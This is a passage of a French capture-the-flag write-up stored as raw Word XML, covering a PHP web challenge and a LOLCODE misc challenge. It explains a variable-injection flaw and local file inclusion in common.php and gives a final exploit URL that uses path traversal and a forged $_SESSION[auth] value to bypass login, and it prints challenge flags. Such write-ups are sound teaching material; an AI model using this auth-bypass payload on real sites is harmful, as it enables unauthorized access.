                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"cdbd845f59a4350228398a5d47689e2077bb14f2"</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$_SESSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'auth'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'true'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header</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'Location:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>admin.php'</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"&lt;form</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>action=''</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>method='POST'&gt;"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"Password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>&lt;input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>type='password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>name='password'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>&gt;&lt;br&gt;"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"&lt;input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>type='submit'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>value='Login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>!'&gt;"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"&lt;/form&gt;"</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rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous devons appeler la fonction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>get_flag()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour valider le challenge et pour cela nous devons avoir une session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">auth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Une première piste pourrait d’essayer de trouver le clair correspondant au hash sha1 mais on s’apperçoit assez vite que ce n’est pas réalisable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Voyons ce que contient le fichier common.php:</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00"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:r>
              <w:t>php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_GET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>as</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$value</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$$key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">;                                 // [1] =&gt; si on appel la page avec ?toto=tata alors une variable $toto = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>‘tata’</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0000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$lang</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:t>empty</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$lang</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if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>file_exists</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"lang/$lang.php"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>))        // [2] =&gt; Test si le nom du fichier est valide + existe</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include</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"lang/$lang.php"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>;  // [3] Inclu le fichier</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else</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include</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"lang/en.php"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w: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include</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"lang/en.php"</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rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Code source common.php avec des commentaires ajoutés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En [1] nous avons la possibilité de créer/initilialiser des variables arbitraires, nous pouvons utiliser ce fonctionnement pour initialiser notre session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>En [3] nous avons une LFI (Local File Inclusion), nous pouvons donc inclure n’importe quel fichier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous avons tout ce qui nous faut pour appeler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>get_flag()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- la page index qui va effectuer l’inclusion de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>common.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>cette dernière qui nous permet d’initaliser nos sessions + inclure la page admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L’exploit final: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.php?lang=../admin&amp;_SESSION[auth]=true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc1945293522"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Challenges et résolutions des épreuves - Misc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc1260867545"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>MISC 50 - LOLCODE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t>Le LOLCODE est un langage de programmation assez exotique, la page Wikipédia (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">https://fr.wikipedia.org/wiki/LOLCODE) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> est notre meilleure amie pour nous aider à comprendre ce challenge. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Détaillons un peu le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>“Hello World”.</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HAI                                                                  -&gt; Lance le programme</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CAN HAS STDIO?                                        -&gt; Import STDIO</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BTW affiche "Hello world!" à l'écran        -&gt; Commentaire</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VISIBLE "Hello world!"                               -&gt; Affiche “Hello World!” à l’écran</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KTHXBYE                                                       -&gt; Quitte le programme          </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>L’opérateur VISIBLE correspond à la fonction PRINT, on essaie donc d’afficher le contenu de la variable FLAG.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>swissky@crashlab:~$ echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VISIBLE FLAG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">" | nc 90.2.131.77 4242 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>HAI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>CAN HAS STDIO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>IM IN YR 2016</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>BTW ESE IZ FUN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{much_lolc0de_so_flag}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>IM OUTTA YR 2016</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>KTHXBYE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">On récupère ainsi le flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{much_lolc0de_so_flag}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
